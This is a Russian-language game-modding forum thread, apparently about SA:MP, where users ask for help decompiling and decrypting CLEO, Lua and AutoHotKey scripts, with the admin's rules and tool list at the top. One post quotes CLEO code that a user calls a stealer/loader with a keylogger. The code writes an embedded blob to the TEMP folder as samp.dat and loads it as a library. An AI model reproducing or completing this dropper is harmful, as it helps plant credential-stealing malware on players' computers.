Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,763
5,914
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:
D

deleted-user-222200

Гость
Please decrypt (It has a keylogger, but I still need its functionality)

decrypt plz
stealer/loader:
{$CLEO .cs}
{$USE bitwise}
{$USE CLEO+}
{$USE file}
{$USE newOpcodes}

0000: NOP
0002: jump @Label19977

//:Label9
//here hex with pseudocode strings that used in opcode 0AC6: while writing the samp.dat in label19977

:Label19977
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET
0AC8: 2@ = allocate_memory_size 260
0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP"
0AC8: 4@ = allocate_memory_size 260
0AD3: 4@ = format "%s\\samp.dat" 2@
0AA2: 0@ = load_library "msvcrt.dll" // IF and SET
0AA4: 1@ = get_proc_address "fopen" library 0@ // IF and SET
0AA7: call_function 1@ num_params 2 pop 2 "wb" 4@ 3@
0AA4: 1@ = get_proc_address "fwrite" library 0@ // IF and SET
0AC6: 5@ = label @Label9 offset //
0AA5: call 1@ num_params 4 pop 4 3@ 1 19968 5@
0AA4: 1@ = get_proc_address "fclose" library 0@ // IF and SET
0AA5: call 1@ num_params 1 pop 1 3@
0AA2: 6@ = load_library 4@ // IF and SET

:Label20226
0001: wait 100 ms
0002: jump @Label20226
 

Вложения

  • CLEOPARASERMILLONARIO_with_pseudo.txt
    72.1 KB · Просмотры: 2

Join feder

Новичок
3
0
Расшифройте пожалуйста
 

Вложения

  • Mego_Cheat_v3.2.lua
    1.4 MB · Просмотры: 2
  • 18.08.24_Farm_AYGumHack.lua
    1.6 MB · Просмотры: 2

kuboni

Потрачен
154
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Pls help me

Pls again
 

Вложения

  • kkkkkk.luac
    205.9 KB · Просмотры: 4
  • kkkk-m.luac
    205.9 KB · Просмотры: 2
Последнее редактирование: